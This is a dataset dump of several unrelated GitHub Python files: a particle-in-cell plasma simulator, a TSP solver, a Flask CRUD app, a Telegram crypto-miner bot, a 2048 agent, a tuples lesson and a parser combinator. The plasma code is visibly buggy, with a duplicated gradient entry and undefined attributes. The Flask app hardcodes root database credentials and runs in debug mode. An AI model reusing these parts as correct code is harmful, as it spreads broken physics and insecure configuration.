acceleration of particles\n self.pos = np.zeros((N,2))\n self.vel = np.zeros((N,2))\n self.acc = np.zeros((N,2))\n \n # electric potential, E-field and B-field : field dynamics\n self.phi_mesh = np.zeros((N_mesh, N_mesh))\n self.Ex_mesh = np.zeros((N_mesh, N_mesh))\n self.Ey_mesh = np.zeros((N_mesh, N_mesh))\n self.Bx_mesh = np.zeros((N_mesh, N_mesh))\n self.By_mesh = np.zeros((N_mesh, N_mesh))\n \n # Field representation for particle motion\n self.E = np.zeros((N, 2))\n self.B = np.zeros((N, 2))\n \n self.initialize_condition() # initialize x,v,a that is equivalent to the problem\n \n # index paramters for updating each mesh grid\n self.indx_l = np.zeros((N,2))\n \n self.indx_l[:,0] = np.floor(self.pos[:,0] / self.dx).astype(int)\n self.indx_l[:,1] = np.floor(self.pos[:,1] / self.dy).astype(int)\n self.indx_r = self.indx_l + np.ones_like(self.indx_l)\n \n self.weight_l = np.zeros_like(self.indx_l)\n self.weight_l[:,0] = (self.indx_r[:,0] * self.dx - self.pos[:,0]) / self.dx\n self.weight_l[:,1] = (self.indx_r[:,1] * self.dy - self.pos[:,1]) / self.dy\n \n self.weight_r = np.zeros_like(self.weight_l)\n self.weight_r[:,0] = (self.pos[:,0] - self.indx_l[:,0] * self.dx) / self.dx\n self.weight_r[:,1] = (self.pos[:,1] - self.indx_l[:,1] * self.dy) / self.dy\n \n # periodic BC\n self.indx_r = np.mod(self.indx_r, N_mesh)\n \n # electron density\n nx = np.bincount(self.indx_l[:,0], weights=self.weight_l[:,0], minlength=N_mesh)\n ny = np.bincount(self.indx_l[:,1], weights=self.weight_l[:,1], minlength=N_mesh)\n self.n = nx.reshape(-1,1) * ny.reshape(1,-1)\n \n nx = np.bincount(self.indx_r[:,0], weights=self.weight_r[:,0], minlength=N_mesh)\n ny = np.bincount(self.indx_r[:,1], weights=self.weight_r[:,1], minlength=N_mesh)\n self.n += nx.reshape(-1,1) * ny.reshape(1,-1)\n self.n *= self.n0 * (self.Lx / self.dx) * (self.Ly / self.dy) / self.N \n \n # gradient field and laplacian of potential\n self.grad_x = np.zeros((N_mesh, N_mesh))\n self.grad_y = np.zeros((N_mesh, N_mesh))\n self.laplacian = 
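The PIC `__init__` above splits each particle between its two neighbouring mesh nodes per axis (cloud-in-cell weighting): the closer node gets the larger weight, and the two weights sum to one. A one-particle sketch of the same formulas along x; the numbers are arbitrary:

```python
import numpy as np

dx, N_mesh = 0.5, 8
x = 1.7                                   # particle position

indx_l = int(np.floor(x / dx))            # left grid index -> 3
indx_r = (indx_l + 1) % N_mesh            # periodic right neighbour
weight_l = ((indx_l + 1) * dx - x) / dx   # -> 0.6
weight_r = (x - indx_l * dx) / dx         # -> 0.4
assert abs(weight_l + weight_r - 1.0) < 1e-12
```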
np.zeros((N_mesh * N_mesh, N_mesh*N_mesh))\n \n self.generate_grad()\n self.generate_laplacian()\n \n def initialize_condition(self): \n np.random.seed(42)\n \n def generate_grad(self):\n \n dx = self.dx\n dy = self.dy\n \n for idx_i in range(0,self.N_mesh):\n \n if idx_i > 0:\n self.grad_x[idx_i, idx_i - 1] = -1.0\n self.grad_y[idx_i, idx_i - 1] = -1.0\n \n if idx_i < self.N_mesh - 1:\n self.grad_x[idx_i, idx_i + 1] = 1.0\n self.grad_y[idx_i, idx_i - 1] = -1.0\n \n # periodic condition\n self.grad_x[0,self.N_mesh - 1] = -1.0\n self.grad_x[self.N_mesh - 1,0] = 1.0\n self.grad_x /= 2*dx\n \n self.grad_y[0,self.N_mesh - 1] = -1.0\n self.grad_y[self.N_mesh - 1,0] = 1.0\n self.grad_y /= 2*dy\n \n def compute_grad(self, A : np.ndarray, axis : Literal['x', 'y'] = 'x'):\n if axis == 'x':\n grad_A = self.grad_x * A.T\n else:\n grad_A = self.grad_y * A\n return grad_A\n \n def generate_laplacian(self):\n dx = self.dx\n dy = self.dy\n \n for idx_i in range(1,self.N_mesh-1):\n for idx_j in range(1,self.N_mesh-1):\n \n idx = self.N_mesh * idx_i + idx_j\n drow = self.N_mesh \n \n self.laplacian[idx, idx - 1] = 1.0 / dx ** 2\n self.laplacian[idx, idx + 1] = 1.0 / dx ** 2\n \n self.laplacian[idx, idx - drow] = 1.0 / dy ** 2\n self.laplacian[idx, idx + drow] = 1.0 / dy ** 2\n \n self.laplacian[idx, idx] = (-2.0) / dx ** 2 + (-2.0) / dy ** 2\n \n def linear_solve(self, A : np.ndarray, B : np.array):\n B = B.reshape(-1,1)\n x = linalg.solve(A,B)\n return x.reshape(-1,1)\n \n def solve(self):\n \n Nt = int(np.ceil((self.tmax - self.tmin) / self.dt))\n \n # we have to compute initial acceleration\n self.update_acc()\n \n if self.use_animation:\n pos_list = []\n vel_list = []\n \n pos_list.append(self.x)\n vel_list.append(self.v)\n \n else:\n pos_list = None\n vel_list = None\n \n for i in tqdm(range(Nt), 'PIC simulation process'):\n \n # velocity update\n self.update_velocity()\n \n # position update\n self.update_position()\n \n # density update\n self.update_density()\n \n # acceleration update\n self.update_acc()\n \n # velocity update with 1/2 kick\n self.update_velocity()\n \n if pos_list is not None:\n pos_list.append(self.x)\n vel_list.append(self.v)\n \n plt.figure(figsize = (6,4))\n plt.scatter(self.x[0:self.Nh],self.v[0:self.Nh],s=.5,color='blue', alpha=0.5)\n plt.scatter(self.x[self.Nh:], self.v[self.Nh:], s=.5,color='red', alpha=0.5)\n plt.xlabel(\"x pos\")\n plt.ylabel(\"vel\")\n plt.xlim([0,self.L])\n plt.ylim([-8, 8])\n plt.tight_layout()\n plt.savefig(\"./result/PIC.png\", dpi=160)\n print(\"# Computation process end\")\n \n if self.use_animation:\n print(\"# Generating animation file\")\n fig, ax = plt.subplots(1,1,figsize = (6,4), facecolor = 'white', dpi=160)\n \n def _plot(idx : int, ax:Axes, pos_list, vel_list):\n ax.cla()\n \n pos = pos_list[idx]\n vel = vel_list[idx]\n \n ax.scatter(pos[0:self.Nh],vel[0:self.Nh],s=.5,color='blue', alpha=0.5)\n ax.scatter(pos[self.Nh:], vel[self.Nh:], s=.5,color='red', alpha=0.5)\n ax.set_xlabel(\"x pos\")\n ax.set_ylabel(\"vel\")\n ax.set_xlim([0,self.L])\n ax.set_ylim([-8, 8])\n \n replay = lambda idx : _plot(idx, ax, pos_list, vel_list)\n idx_max = len(pos_list) - 1\n indices = [i for i in range(idx_max)]\n ani = animation.FuncAnimation(fig, replay, frames = indices)\n writergif = animation.PillowWriter(fps = self.plot_freq, bitrate = False)\n ani.save(self.save_dir, writergif)\n \n print(\"# Complete\")\n \n def update_velocity(self):\n self.vel += self.acc * self.dt / 2.0\n \n def update_position(self):\n self.pos += self.vel * self.dt\n 
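`generate_grad()` above assembles a periodic central-difference matrix with +1/-1 off-diagonals scaled by 1/(2*dx) and wrap-around corner entries. A quick numerical check of that construction against a known derivative (sin' = cos):

```python
import numpy as np

N = 64
dx = 2 * np.pi / N
x = np.arange(N) * dx

D = np.zeros((N, N))
for i in range(N):
    D[i, (i + 1) % N] = 1.0    # the modulo supplies the periodic corners
    D[i, (i - 1) % N] = -1.0
D /= 2 * dx

err = np.max(np.abs(D @ np.sin(x) - np.cos(x)))
print(err)  # second-order accurate: ~1.6e-3 for N = 64
```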
self.pos[:,0] = np.mod(self.pos[:,0], self.Lx)\n self.pos[:,1] = np.mod(self.pos[:,1], self.Ly)\n \n def update_acc(self):\n self.phi_mesh = self.linear_solve(self.laplacian, self.n - self.n0).reshape(self.N_mesh, self.N_mesh)\n self.Ex_mesh = (-1) * self.compute_grad(self.phi_mesh, 'x')\n self.Ey_mesh = (-1) * self.compute_grad(self.phi_mesh, 'y')\n \n for idx in range(self.N):\n self.E[idx,0] = self.weight_l[idx,0] * self.Ex_mesh[self.indx_l[idx]] + self.weight_r[idx,0] * self.Ex_mesh[self.indx_r[idx]]\n self.E[idx,1] = self.weight_l[idx,1] * self.Ey_mesh[self.indx_l[idx]] + self.weight_r[idx,1] * self.Ey_mesh[self.indx_r[idx]] \n \n # update acceleration\n self.acc[:,0] = (-1) * (self.E[:,0] + self.vel[:,1] * self.B[:,0])\n self.acc[:,1] = (-1) * (self.E[:,1] - self.vel[:,0] * self.B[:,1])\n \n def update_density(self):\n self.indx_l[:,0] = np.floor(self.pos[:,0] / self.dx).astype(int)\n self.indx_l[:,1] = np.floor(self.pos[:,1] / self.dy).astype(int)\n self.indx_r = self.indx_l + np.ones_like(self.indx_l)\n \n self.weight_l = np.zeros_like(self.indx_l)\n self.weight_l[:,0] = (self.indx_r[:,0] * self.dx - self.pos[:,0]) / self.dx\n self.weight_l[:,1] = (self.indx_r[:,1] * self.dy - self.pos[:,1]) / self.dy\n \n self.weight_r = np.zeros_like(self.weight_l)\n self.weight_r[:,0] = (self.pos[:,0] - self.indx_l[:,0] * self.dx) / self.dx\n self.weight_r[:,1] = (self.pos[:,1] - self.indx_l[:,1] * self.dy) / self.dy\n \n # periodic BC\n self.indx_r = np.mod(self.indx_r, self.N_mesh)\n \n # electron density\n nx = np.bincount(self.indx_l[:,0], weights=self.weight_l[:,0], minlength=self.N_mesh)\n ny = np.bincount(self.indx_l[:,1], weights=self.weight_l[:,1], minlength=self.N_mesh)\n self.n = nx.reshape(-1,1) * ny.reshape(1,-1)\n \n nx = np.bincount(self.indx_r[:,0], weights=self.weight_r[:,0], minlength=self.N_mesh)\n ny = np.bincount(self.indx_r[:,1], weights=self.weight_r[:,1], minlength=self.N_mesh)\n self.n += nx.reshape(-1,1) * ny.reshape(1,-1)\n self.n *= self.n0 * (self.Lx / self.dx) * (self.Ly / self.dy) / self.N ","repo_name":"ZINZINBIN/PIC-plasmas","sub_path":"src/PIC2D.py","file_name":"PIC2D.py","file_ext":"py","file_size_in_byte":10903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22693448333","text":"from turfpy import measurement\nfrom ortools.constraint_solver import routing_enums_pb2\nfrom ortools.constraint_solver import pywrapcp\n\n\ndef solve_tsp(points):\n distance_matrix = []\n for i in range(len(points)):\n dist_list = []\n for j in range(len(points)):\n start = [points.geometry[i].x, points.geometry[i].y]\n end = [points.geometry[j].x, points.geometry[j].y]\n dist = round(measurement.distance(start, end) * 1000)\n dist_list.append(dist)\n distance_matrix.append(dist_list)\n data = {\n 'distance_matrix': distance_matrix,\n 'num_vehicles': 1,\n 'depot': 0\n }\n\n manager = pywrapcp.RoutingIndexManager(len(data['distance_matrix']), data['num_vehicles'], data['depot'])\n routing = pywrapcp.RoutingModel(manager)\n\n def distance_callback(from_index, to_index):\n from_node = manager.IndexToNode(from_index)\n to_node = manager.IndexToNode(to_index)\n return data['distance_matrix'][from_node][to_node]\n\n transit_callback_index = routing.RegisterTransitCallback(distance_callback)\n routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)\n search_parameters = pywrapcp.DefaultRoutingSearchParameters()\n search_parameters.first_solution_strategy = routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC\n 
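`solve()` above advances particles with two half velocity kicks around a full position drift (kick-drift-kick leapfrog). The scheme's appeal is its long-term energy behaviour, shown here for a 1D harmonic oscillator where acc = -x, a toy stand-in for the electric-field acceleration:

```python
dt, steps = 0.1, 1000
x, v = 1.0, 0.0
for _ in range(steps):
    v += -x * dt / 2.0   # half kick
    x += v * dt          # drift
    v += -x * dt / 2.0   # half kick, using the updated acceleration
print(0.5 * (x**2 + v**2))  # stays close to the initial energy of 0.5
```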
solution = routing.SolveWithParameters(search_parameters)\n\n    index = routing.Start(0)\n    route = [manager.IndexToNode(index)]\n    while not routing.IsEnd(index):\n        index = solution.Value(routing.NextVar(index))\n        route.append(manager.IndexToNode(index))\n    return route\n","repo_name":"gbsehnsucht/tsp_script","sub_path":"process_tsp.py","file_name":"process_tsp.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4477214794","text":"#!/usr/bin/env python3\nfrom flask import Flask, render_template, request, url_for, redirect\nfrom flask_sqlalchemy import SQLAlchemy\napp = Flask(__name__)\n#mysql\napp.config['SQLALCHEMY_DATABASE_URI']=\"mysql://root:root@127.0.0.1:3306/flask_products\"\n#mariadb\n#app.config['SQLALCHEMY_DATABASE_URI']=\"mariadb+mariadbconnector://root:root@127.0.0.1:3306/flask_products\"\ndb = SQLAlchemy(app)\n\n@app.route('/', methods=['GET','POST'])\ndef index():\n    if request.method == \"POST\":\n        productName = request.form[\"name\"]\n        productPrice = request.form[\"price\"]\n        productStock = request.form[\"quantity_in_stock\"]\n        db.session.execute(\"INSERT INTO products(name,price,quantity_in_stock) VALUES(:n,:p ,:s)\",\n        {\"n\":productName,\"p\":productPrice,\"s\":productStock})\n        db.session.commit()\n        return redirect(\"/\")\n    else:\n        products = db.session.execute(\"SELECT * FROM products\")\n        return render_template('index.html',products=products)\n@app.route(\"/delete/<int:id>\")\ndef delete(id):\n    db.session.execute(\"DELETE FROM products WHERE id = :id\",{\"id\":id})\n    db.session.commit()\n    return redirect(\"/\")\n@app.route(\"/update/<int:id>\", methods=[\"GET\",\"POST\"])\ndef update(id):\n    if request.method == \"POST\":\n        productName = request.form[\"name\"]\n        productPrice = request.form[\"price\"]\n        productStock = request.form[\"quantity_in_stock\"]\n        db.session.execute(\"UPDATE products SET name= :n ,price= :p ,quantity_in_stock= :s WHERE id= :id\",\n        {\"n\":productName,\"p\":productPrice,\"s\":productStock,\"id\":id})\n        db.session.commit()\n        return redirect(\"/\")\nif __name__ == \"__main__\":\n    app.run(debug=True)\n","repo_name":"Maxi-Fittipaldi/flask_app_ejemplo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12898060907","text":"import random\nimport threading\n\nimport peewee\nfrom telegram import ChatAction, InlineKeyboardButton, InlineKeyboardMarkup, ParseMode\nfrom telegram.ext import CallbackQueryHandler, CommandHandler\n\nfrom bot.api import Barrenero\nfrom bot.exceptions import BarreneroRequestException\nfrom bot.models import API, Chat\nfrom bot.state_machine import StatusStateMachine\nfrom bot.utils import humanize_iso_date\n\nstatus_machines = {}\nlock = threading.RLock()\n\n\nclass EtherMixin:\n    def ether(self, bot, update):\n        \"\"\"\n        Call for Ether miner status and restarting service.\n        \"\"\"\n        chat_id = update.message.chat.id\n        bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING)\n\n        try:\n            Chat.get(id=chat_id)\n        except peewee.DoesNotExist:\n            self.logger.error('Chat unregistered')\n            response_text = 'Configure me first'\n            bot.send_message(chat_id, response_text)\n        else:\n            keyboard = [\n                [\n                    InlineKeyboardButton(\"Status\", callback_data='[ether_status]'),\n                    InlineKeyboardButton(\"Nanopool\", callback_data='[ether_nanopool]')\n                ],\n                [\n                    InlineKeyboardButton(\"Restart\", callback_data='[ether_restart]'),\n                ],\n            
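process_tsp.py above follows the standard OR-tools routing recipe: index manager, transit callback, arc-cost evaluator, then a PATH_CHEAPEST_ARC first solution. The same recipe runs self-contained with a hardcoded distance matrix, so no turfpy or GeoDataFrame is needed; the 4-city matrix below is invented:

```python
from ortools.constraint_solver import routing_enums_pb2, pywrapcp

dist = [[0, 2, 9, 10],
        [2, 0, 6, 4],
        [9, 6, 0, 3],
        [10, 4, 3, 0]]

manager = pywrapcp.RoutingIndexManager(len(dist), 1, 0)  # 1 vehicle, depot 0
routing = pywrapcp.RoutingModel(manager)

def distance_callback(i, j):
    return dist[manager.IndexToNode(i)][manager.IndexToNode(j)]

cb = routing.RegisterTransitCallback(distance_callback)
routing.SetArcCostEvaluatorOfAllVehicles(cb)
params = pywrapcp.DefaultRoutingSearchParameters()
params.first_solution_strategy = routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC

solution = routing.SolveWithParameters(params)
index = routing.Start(0)
route = [manager.IndexToNode(index)]
while not routing.IsEnd(index):
    index = solution.Value(routing.NextVar(index))
    route.append(manager.IndexToNode(index))
print(route)  # a closed tour starting and ending at the depot
```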
]\n            reply_markup = InlineKeyboardMarkup(keyboard)\n            bot.send_message(chat_id, 'Select an option:', reply_markup=reply_markup)\n\n    def ether_nanopool(self, bot, update):\n        \"\"\"\n        Query for Nanopool account info.\n        \"\"\"\n        query = update.callback_query\n        chat_id = query.message.chat_id\n\n        bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING)\n\n        data = None\n        try:\n            chat = Chat.get(id=chat_id)\n            api = random.choice(chat.apis)\n            data = Barrenero.ether(api.url, api.token)\n\n            response_text = f'*Ether miner*\\n' \\\n                            f' - Balance: `{data[\"nanopool\"][\"balance\"][\"confirmed\"]} ETH`\\n\\n' \\\n                            f'*Hashrate*\\n' \\\n                            f' - Current: `{data[\"nanopool\"][\"hashrate\"][\"current\"]} MH/s`\\n' \\\n                            f' - 1 hour: `{data[\"nanopool\"][\"hashrate\"][\"one_hour\"]} MH/s`\\n' \\\n                            f' - 3 hours: `{data[\"nanopool\"][\"hashrate\"][\"three_hours\"]} MH/s`\\n' \\\n                            f' - 6 hours: `{data[\"nanopool\"][\"hashrate\"][\"six_hours\"]} MH/s`\\n' \\\n                            f' - 12 hours: `{data[\"nanopool\"][\"hashrate\"][\"twelve_hours\"]} MH/s`\\n' \\\n                            f' - 24 hours: `{data[\"nanopool\"][\"hashrate\"][\"twenty_four_hours\"]} MH/s`\\n\\n' \\\n                            f'*Last payment*\\n' \\\n                            f' - Date: `{humanize_iso_date(data[\"nanopool\"][\"last_payment\"][\"date\"])}`\\n' \\\n                            f' - Value: `{data[\"nanopool\"][\"last_payment\"][\"value\"]} ETH`\\n\\n' \\\n                            f'*Workers*\\n' + \\\n                            '\\n'.join(f' - {w}: `{v} MH/s`' for w, v in data['nanopool']['workers'].items())\n        except peewee.DoesNotExist:\n            self.logger.error('Chat unregistered')\n            response_text = 'Configure me first'\n        except BarreneroRequestException as e:\n            self.logger.exception(e.message)\n            response_text = e.message\n        except:\n            response_text = 'Cannot retrieve Nanopool info'\n            self.logger.exception('Barrenero API wrong response for Nanopool info: %s', str(data))\n\n        bot.edit_message_text(text=response_text, parse_mode=ParseMode.MARKDOWN, chat_id=query.message.chat_id,\n                              message_id=query.message.message_id)\n\n    def ether_miner_choice(self, bot, update, groups):\n        \"\"\"\n        Call for Ether miner status and restarting service.\n        \"\"\"\n        query = update.callback_query\n        action = groups[0]\n        chat_id = query.message.chat_id\n        bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING)\n        try:\n            chat = Chat.get(id=chat_id)\n        except peewee.DoesNotExist:\n            chat = False\n\n        if chat:\n            buttons = [InlineKeyboardButton(api.name, callback_data=f'[ether_{action}][{api.id}]')\n                       for api in chat.apis if api.superuser]\n            keyboard = [buttons[i:i + 4] for i in range(0, len(buttons), 4)]\n            reply_markup = InlineKeyboardMarkup(keyboard)\n        else:\n            reply_markup = None\n\n        if reply_markup:\n            bot.edit_message_text(text='Select miner:', reply_markup=reply_markup, chat_id=chat_id,\n                                  message_id=query.message.message_id)\n        else:\n            bot.edit_message_text(text='No options available', chat_id=chat_id, message_id=query.message.message_id)\n\n    def ether_restart(self, bot, update, groups):\n        \"\"\"\n        Restart ether service.\n        \"\"\"\n        query = update.callback_query\n        api_id = groups[0]\n        chat_id = query.message.chat_id\n\n        bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING)\n\n        try:\n            api = API.get(id=api_id)\n            Barrenero.restart(api.url, api.token, 'Ether')\n\n            response_text = f'*API {api.name}*\\n' \\\n                            f'Restarting Ether.'\n        except peewee.DoesNotExist:\n            self.logger.error('Chat unregistered')\n            response_text = 'Configure me first'\n        except BarreneroRequestException as e:\n            self.logger.exception(e.message)\n            response_text = e.message\n        except:\n            self.logger.exception('Cannot restart API %s Ether miner', 
api.name)\n response_text = f'*API {api.name} - Ether miner*\\nCannot restart miner'\n\n bot.edit_message_text(text=response_text, parse_mode=ParseMode.MARKDOWN, chat_id=chat_id,\n message_id=query.message.message_id)\n\n def ether_status(self, bot, update, groups):\n \"\"\"\n Check Ether miner status.\n \"\"\"\n query = update.callback_query\n api_id = groups[0]\n chat_id = query.message.chat_id\n\n bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING)\n\n try:\n api = API.get(id=api_id)\n\n data = Barrenero.ether(api.url, api.token)\n\n response_text = f'*API {api.name}*\\n' \\\n f'*Ether miner*\\n' \\\n f' - Status: {data[\"active\"]}\\n\\n' \\\n f'*Hashrate*\\n' \\\n + '\\n'.join([f' - Graphic card #{h[\"graphic_card\"]}: `{h[\"hashrate\"]:.2f} MH/s`'\n for h in data['hashrate']])\n except peewee.DoesNotExist:\n self.logger.error('Chat unregistered')\n response_text = 'Configure me first'\n except BarreneroRequestException as e:\n self.logger.exception(e.message)\n response_text = f'*API {api.name} - Ether miner*\\n{e.message}'\n except:\n response_text = f'*API {api.name} - Ether miner*\\nCannot retrieve Ether miner status'\n self.logger.exception('Barrenero API wrong response for Ether miner status: %s', str(data))\n\n bot.edit_message_text(text=response_text, parse_mode=ParseMode.MARKDOWN, chat_id=chat_id,\n message_id=query.message.message_id)\n\n def ether_job_status(self, bot, job):\n \"\"\"\n Check miner status\n \"\"\"\n self.logger.debug('Job: Check Ether status')\n\n # Create new state machines\n global status_machines\n\n with lock:\n new_machines = {a: StatusStateMachine('Ether', a.name)\n for a in API.select().where(API.superuser == True).join(Chat)\n if a not in status_machines}\n status_machines.update(new_machines)\n\n self.logger.debug('Ether Status Machines: %s', str(status_machines))\n for api, status in status_machines.items():\n try:\n data = Barrenero.ether(api.url, api.token)\n\n if data['active']:\n status.start(bot=bot, chat=api.chat.id)\n else:\n status.stop(bot=bot, chat=api.chat.id)\n except BarreneroRequestException:\n if status.is_active:\n bot.send_message(api.chat.id, f'Cannot access `{api.name}`', parse_mode=ParseMode.MARKDOWN)\n status.stop(bot=bot, chat=api.chat.id)\n\n def add_ether_command(self):\n self.updater.dispatcher.add_handler(CommandHandler('ether', self.ether))\n self.updater.dispatcher.add_handler(CallbackQueryHandler(self.ether_restart, pass_groups=True,\n pattern=r'\\[ether_restart\\]\\[(\\d+)\\]'))\n self.updater.dispatcher.add_handler(CallbackQueryHandler(self.ether_status, pass_groups=True,\n pattern=r'\\[ether_status\\]\\[(\\d+)\\]'))\n self.updater.dispatcher.add_handler(CallbackQueryHandler(self.ether_miner_choice, pass_groups=True,\n pattern=r'\\[ether_(restart|status)\\]$'))\n self.updater.dispatcher.add_handler(CallbackQueryHandler(self.ether_nanopool, pattern=r'\\[ether_nanopool\\]'))\n\n def add_ether_jobs(self):\n self.updater.job_queue.run_repeating(self.ether_job_status, interval=180.0)\n","repo_name":"perdy/barrenero-telegram","sub_path":"bot/mixins/ether.py","file_name":"ether.py","file_ext":"py","file_size_in_byte":9579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15498768873","text":"import time\nfrom abc import ABC, abstractmethod\nfrom typing import Union, Tuple\n\nfrom src.game.controller.game import Game\nfrom src.game.utils import UP, DOWN, LEFT, RIGHT\nfrom src.game.view.gameUI import GameUI\n\n\nclass Player(ABC):\n def __init__(self, 
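The ether mixin above routes inline-button presses through regex patterns whose capture groups become the handler's `groups` argument; `pass_groups=True` is the pre-v12 python-telegram-bot API that the record uses throughout. A minimal registration sketch assuming that same API version; the token and handler body are placeholders:

```python
from telegram.ext import CallbackQueryHandler, Updater

def on_restart(bot, update, groups):
    api_id = groups[0]  # captured by (\d+) in the pattern below
    update.callback_query.answer(text=f'restarting miner {api_id}')

updater = Updater(token='PLACEHOLDER-TOKEN')
updater.dispatcher.add_handler(
    CallbackQueryHandler(on_restart, pass_groups=True,
                         pattern=r'\[ether_restart\]\[(\d+)\]'))
```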
game: Game, quiet: bool = False, ui: bool = True) -> None:\n \"\"\"\n Init function for Player Class\n :param game: Game: game object\n :param quiet: bool: quiet mode, whether you want messages to be printed\n \"\"\"\n self.ui = ui\n self._game = game\n self._quiet = quiet\n\n @abstractmethod\n def get_move(self) -> Union[UP, DOWN, LEFT, RIGHT]:\n \"\"\"\n :return: direction of movement: Union[UP, DOWN, LEFT, RIGHT]\n \"\"\"\n raise NotImplementedError\n\n def run(self, fps: int = 30) -> Tuple[int, int, float]:\n \"\"\"\n main logic for running the game\n :param fps: int: frame per second of animation\n :return: Tuple[score, max value reached, runtime used]\n \"\"\"\n game_ui = GameUI(game=self._game, fps=fps) if self.ui else None\n self._game.restart()\n if self.ui:\n game_ui.update_ui()\n iteration = 0\n t_0 = time.time()\n while not self._game.get_is_done():\n move = self.get_move()\n self._game.move(move)\n if self.ui:\n game_ui.update_ui()\n if self._game.get_is_done():\n if not self._quiet:\n print(\n f\"done, {iteration} iterations, score: {self._game.get_score()}, \"\n f\"{round(time.time() - t_0, 2)}s, max value: {self._game.get_max_val()}\")\n break\n if self._game.has_won():\n if not self._quiet:\n print(\n f\"won, {iteration} iterations, score: {self._game.get_score()}, \"\n f\"{round(time.time() - t_0, 2)}s, max value: {self._game.get_max_val()}\")\n break\n iteration += 1\n return self._game.get_score(), self._game.get_max_val(), time.time() - t_0\n","repo_name":"HuakunShen/2048AI","sub_path":"src/agent/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6037985243","text":"# Tuples ar immutables\r\n\r\ninformations = \"Matheus\", \"00/00/2022\", \"00/20/2022\", 2000, \"Employee\"\r\nprint(informations)\r\n\r\nname = informations[0]\r\nwas_born = informations[1]\r\nnumber = informations[3]\r\n\r\nprint(name, was_born, number)\r\n\r\n# OR\r\n# Unpacking\r\n\r\nname, was_born, birthday, number, office = informations\r\n\r\n#\r\n\r\nsales = [100, 200, 300, 400, 500]\r\nemployees = [\"João\", \"Matheus\", \"Lucas\", \"Bruno\", \"Pedro\"]\r\n\r\nfor i, sale in enumerate(sales):\r\n # for item in enumerate(sales):\r\n # print(item) → Tuples (0, 100)\r\n print(f\"{employees[i]} sold {sale} unities\")","repo_name":"franssa01/Courses","sub_path":"Hashtag Programação/Python Impressionador/08 Tuples/Classes/CL027 Tuples.py","file_name":"CL027 Tuples.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32955696204","text":"__all__ = [\"RepeatedSeparatedParser\", \"repsep\", \"RepeatedOnceSeparatedParser\", \"rep1sep\"]\n\nfrom typing import Any, Generic, Optional, Sequence, Union\n\nfrom ..state import Continue, Input, Output, Reader, RecursionError, State\nfrom ._base import Parser, wrap_literal\n\n\nclass RepeatedSeparatedParser(Generic[Input, Output], Parser[Input, Sequence[Output]]):\n def __init__(\n self,\n parser: Parser[Input, Output],\n separator: Parser[Input, Any],\n *,\n min: int = 0,\n max: Optional[int] = None,\n ):\n super().__init__()\n self.parser = parser\n self.separator = separator\n self.min = min\n self.max = max\n\n def _consume(self, state: State[Input], reader: Reader[Input]):\n status = self.parser.consume(state, reader)\n\n if not isinstance(status, Continue):\n output = []\n remainder = reader\n else:\n output = [status.value]\n 
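The tuples lesson above pairs `employees` and `sales` through `enumerate` plus indexing; `zip()` expresses the same pairing directly, without index bookkeeping:

```python
sales = [100, 200, 300, 400, 500]
employees = ["João", "Matheus", "Lucas", "Bruno", "Pedro"]

# zip walks both lists in lockstep
for employee, sale in zip(employees, sales):
    print(f"{employee} sold {sale} units")
```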
remainder = status.remainder\n while self.max is None or len(output) < self.max:\n # If the separator matches, but the parser does not, the\n # remainder from the last successful parser step must be used,\n # not the remainder from any separator. That is why the parser\n # starts from the remainder on the status, but remainder is not\n # updated until after the parser succeeds.\n status = self.separator.consume(state, remainder)\n if isinstance(status, Continue):\n status = self.parser.consume(state, status.remainder)\n if isinstance(status, Continue):\n if remainder.position == status.remainder.position:\n raise RecursionError(self, remainder)\n\n remainder = status.remainder\n output.append(status.value)\n else:\n break\n else:\n break\n\n if len(output) >= self.min:\n return Continue(remainder, output)\n else:\n return None\n\n def __repr__(self):\n rep_string = self.parser.name_or_repr()\n sep_string = self.separator.name_or_repr()\n min_string = f\", min={self.min}\" if self.min > 0 else \"\"\n max_string = f\", max={self.max}\" if self.max is not None else \"\"\n string = f\"repsep({rep_string}, {sep_string}{min_string}{max_string})\"\n return self.name_or_nothing() + string\n\n\ndef repsep(\n parser: Union[Parser[Input, Output], Sequence[Input]],\n separator: Union[Parser[Input, Any], Sequence[Input]],\n *,\n min: int = 0,\n max: Optional[int] = None,\n) -> RepeatedSeparatedParser[Input, Output]:\n \"\"\"Match a parser zero or more times separated by another parser.\n\n This matches repeated sequences of ``parser`` separated by ``separator``. A\n list is returned containing the value from each match of ``parser``. The\n values from ``separator`` are discarded. If there are no matches, an empty\n list is returned.\n\n Args:\n parser: Parser or literal\n separator: Parser or literal\n min: Nonnegative integer defining the minimum number of entries matched\n before the parser can succeed\n max: Nonnegative integer defining the maximum number of entries that\n will be matched or ``None``, meaning that there is no limit\n \"\"\"\n return RepeatedSeparatedParser(wrap_literal(parser), wrap_literal(separator), min=min, max=max)\n\n\nclass RepeatedOnceSeparatedParser(Generic[Input, Output], Parser[Input, Sequence[Output]]):\n def __init__(self, parser: Parser[Input, Output], separator: Parser[Input, Any]):\n super().__init__()\n self.parser = parser\n self.separator = separator\n\n def _consume(self, state: State[Input], reader: Reader[Input]):\n status = self.parser.consume(state, reader)\n\n if status is None:\n return None\n else:\n output = [status.value]\n remainder = status.remainder\n while True:\n # If the separator matches, but the parser does not, the\n # remainder from the last successful parser step must be used,\n # not the remainder from any separator. 
